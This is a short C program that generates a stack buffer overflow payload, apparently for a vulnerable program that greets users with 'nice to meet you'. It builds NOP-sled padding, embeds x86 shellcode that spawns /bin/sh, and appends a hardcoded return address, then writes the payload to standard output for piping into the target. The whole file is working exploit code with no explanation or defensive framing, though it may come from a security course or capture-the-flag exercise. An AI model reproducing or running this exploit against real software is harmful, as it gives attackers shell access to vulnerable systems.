#include <unistd.h>	// for write
#include <stdint.h>	// for uint32_t
#include <string.h>	// for strlen
#include <stdlib.h>	// for free, calloc
#include <stdio.h>      // fprintf

#define BUFFER_SIZE 1024
#define HELLO_MSG "nice to meet you "

const char shellcode[] =
 "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
 "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
 "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
 "\xff\xff/bin/sh";

uint32_t ret = 0xbf85b4e0;

int main(void) {
	size_t hello_size = strlen(HELLO_MSG);
	size_t code_size = sizeof(shellcode) - 1;

        fprintf(stderr, "hello_size = %d\n", hello_size);
        fprintf(stderr, "code_size = %d\n", code_size);

	size_t bourrage = BUFFER_SIZE - hello_size - code_size + 12;
	ret += hello_size + 20; // 

        fprintf(stderr, "bourrage = %d\n", bourrage);
        fprintf(stderr, "ret = %#x\n", ret);

	char * buffer = malloc(bourrage);
	int i;
	for (i = 0; i < bourrage; i++) {
		buffer[i] = 0x90; // NOP
	}
	
	write(1, buffer, 40);
	write(1, shellcode, code_size);
	write(1, buffer, bourrage - 40);

	write(1, &ret, sizeof(ret));
	write(1, "\n", 1);

	free(buffer);

	return 0;
}